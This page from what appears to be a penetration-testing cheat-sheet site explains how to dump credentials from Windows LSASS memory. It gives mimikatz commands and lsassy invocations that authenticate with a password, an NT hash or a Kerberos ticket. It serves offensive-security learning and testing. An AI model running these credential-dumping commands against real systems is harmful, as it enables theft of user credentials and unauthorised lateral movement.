SecuriTree Home

SecuriTree

Windows Security
- Post-exploitation
  - Network Tunneling
    (Ligolo-ng, Chisel)
  - Reverse Shell
  - System Manipulation
  - File Transfer
- Lateral Movement
  - Common Problems
    - Double Hop
    - Remote UAC
  - Techniques
    - Access Token Manipulation
      (RunAs, RunasCs)
    - Pass-the-Ticket (Kerberos)
      (Rubeus, getTGT)
  - Technologies
    - MS-RPC
      - MS-DCOM
      - MS-RRP
      - MS-SCMR
        (PsExec, SmbExec, ScExec)
      - MS-TSCH
      - MS-WMI
        (WmiExec)
    - RDP
    - WinRM
      (winrs, PS Remoting)
- Domain Privesc
  - ACL Abuse
  - AD Delegation Abuse
    - Constrained Delegation
    - Resource-Based Constrained Delegation
    - Unconstrained Delegation
  - AS-Rep Roasting
  - Certificate Service Abuse
  - Credentials Dump
    - DCSync
    - LSASS Memory
    - Local SAM
    - Windows Vault
  - Group Policies
  - Information to steal
    (files, logs, processes, ...)
  - Kerberoasting
  - Local Admin Hunting
  - MSSQL Abuse
  - NTLM Hash Stealing
  - NTLM Relay
  - Password Spraying
  - RDP Hijacking
  - Tasks and Services Abuse
- Reconnaissance
  - Active Directory
  - DNS
  - LDAP
  - NetBIOS
  - NFS
  - Port Scanning
  - RPC
  - SMB
  - SMTP
  - SNMP

#Windows Security #Domain Privesc #Credentials Dump #LSASS Memory

Credentials dump LSASS memory

Requirements:

You have to be a local administrator on the machine (or SYSTEM).

LSASS dump can reveal credentials of users currently or recently logged into the system. The most common cached credentials will be NT hashes and Kerberos TGTs.

Windows:

.\mimikatz.exe
> privilege::debug
> sekurlsa::logonpasswords

Linux:

# Using password
lsassy -u $user -p $password -d $domain $host
 
# Using NT hash
lsassy -u $user -H $nt_hash -d $domain $host
 
# Using Kerberos TGT
export KRB5CCNAME=$tgt_ccache_file
lsassy -k $host

Children